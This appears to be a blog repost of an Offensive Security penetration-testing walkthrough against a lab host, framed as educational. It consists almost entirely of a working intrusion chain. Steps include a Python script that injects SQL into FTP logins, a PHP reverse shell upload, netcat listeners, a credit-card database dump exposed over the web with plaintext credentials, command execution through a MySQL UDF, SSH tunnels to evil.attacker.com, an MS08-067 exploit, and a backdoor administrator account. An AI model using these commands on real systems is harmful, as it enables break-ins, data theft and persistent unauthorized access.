*** Do NOT attack any computer or network without authorization or you may be put into jail. ***
Credit to : muts (of Offensive Security)
This is muts's work but not mine. I re-post here for educational purpose only. It is because I enjoy his videos very much and I am afraid of losing them.
Penetration Testing in the Real World from Offensive Security on Vimeo.
ftp-brute.py
#!/usr/bin/python
from ftplib import FTP
print "Attempting user Directory Discover via FTP"
for i in range(0,6):
username=%') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT "+ STR(I)+",1; -- "
password=str("1")
ftp=FTP('www.offseclabs.com')
ftp.login(username,password)
print "Logged in as user "+str(i)+",1"
ftp.retrlines('LIST')
ftp.close()
Commands
Open Terminal A :
nmap -p 21,80 www.offseclabs.com
nc -v www.offseclabs.com 80
HEAD / HTTP/1.0
(To enumerate the webserver)
clear
ftp www.offseclabs.com
username - bob
password - bob
(To enumerate the ftp server)
ftp www.offseclabs.com
username - %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser; --
password - 1
(logged in to the ftp server)
pwd
ls
bye
clear
cd core
clear
nano brute.py --> (see above ftp-brute.py)
./brute.py
(get the fifth user who has mapped to the root directory of webserver)
clear
ftp www.offseclabs.com
username - %') and 1=2 union select 1,1,uid,gid,homedir,shell from ftpuser LIMIT 5,1; --
password - 1
(logged in as the fifth user)
ls
put rs.php --> (a reverse php shell)
-----------------------
Open Terminal B :
nc -lvp 80
-----------------------
Open Terminal C :
wget www.offseclabs.com/rs.php
(Then, at Terminal B, we got a reverse shell)
-----------------------
Go back to Terminal B :
(inside the reverse shell)
/sbin/ifconfig
pwd
cd /var/www
ls -la
cd includes
cat configure.php
(get the MySQL username and password as well as MySQL server address and database name)
mysqldump -u root -p1q2w3e4r5t6y -h 10.150.0.5 oscommerce > /var/www/images/ccdump.txt
------------------------
Open a Firefox :
www.offseclabs.com/images/ccdump.txt
(we got the database dump)
-------------------------
Go back to Terminal A :
(inside the ftp server)
put up.html --> (file upload html file)
put up.php -- > (file upload php file)
-------------------------
Open Firefox :
www.offseclabs.com/up.html
(upload lib_mysqludf_sys.so and marked it as 1)
(upload rs [a binary reverse shell) and marked it as 2)
** Details of lib_mysqludf_sys.so
---------------------------
Go back to Terminal A :
(quit the ftp server)
bye
clear
exit
(quit Terminal A)
----------------------------
Go back to Terminal B :
mysql -u root -p1q2w3e4r5t6y -h 10.150.0.5
(login to MySQL server)
use pwn;
SELECT imgdata from binfile where title="1" into dumpfile '/usr/lib/lib_mysqludf_sys.so';
SELECT imgdata from binfile where title="2" into dumpfile '/tmp/db';
CREATE FUNCTION lib_mysqludf_sys_info RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_get RETURNS string SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_set RETURNS int SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_exec RETURNS int SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_eval RETURNS string SONAME 'lib_mysqludf_sys.so';
SELECT sys_eval('chmod 755 /tmp/bd');
SELECT sys_eval('/tmp/bd &');
(don't press Enter at this moment)
---------------------------
Open Terminal D :
nc -lvp 80
(go back to Terminal B and press enter, you will get reserver shell at Terminal D)
----------------------------
Open Terminal E :
nc -lvp 80
----------------------------
Go back to Terminal B :
(inside the MySQL server)
SELECT sys_eval('/tmp/bd &');
(press enter and we got another reverse shell at Terminal E)
---------------------------
Go back to Terminal E :
(inside the reverse shell)
ping -c 1 10.150.0.20
clear
ssh -l root -t -t -R 445:10.150.0.20:445 evil.attacker.com
(create a remote tunnel at port 445)
-----------------------------
Open Terminal F :
netstat antp
nmap -sS 127.0.0.1 -p445 --script smb-check-vulns.nse
-----------------------------
Go back to Terminal D :
ssh -l root -t -t -R 4444:10.150.0.20:4444 evil.attacker.com
(create a remote tunnel at port 4444)
clear
------------------------------
Go back to Terminal F :
cd core
nano nx.py --> (a ms08-067 python exploit for win2k3 sp2)
clear
./nx.py 127.0.0.1
nc -v 127.0.0.1 4444
(we got a remote shell of 10.150.0.20)
ip config
net user hacker hacker /add
net localgroup administrators hacker /add
---------------------------------
Go back to Terminal D :
(quit the tunnel)
exit
clear
ssh -l root -t -t -R 3389:10.150.0.20:3389 evil.attacker.com
(create another remote tunnel on port 3389)
clear
-----------------------------------
Open Terminal G :
netstat -antp | grep LISTEN
clear
rdesktop 127.0.0.1
(login to the 10.150.0.20 with username - hacker and password - hacker)
That's all! See you.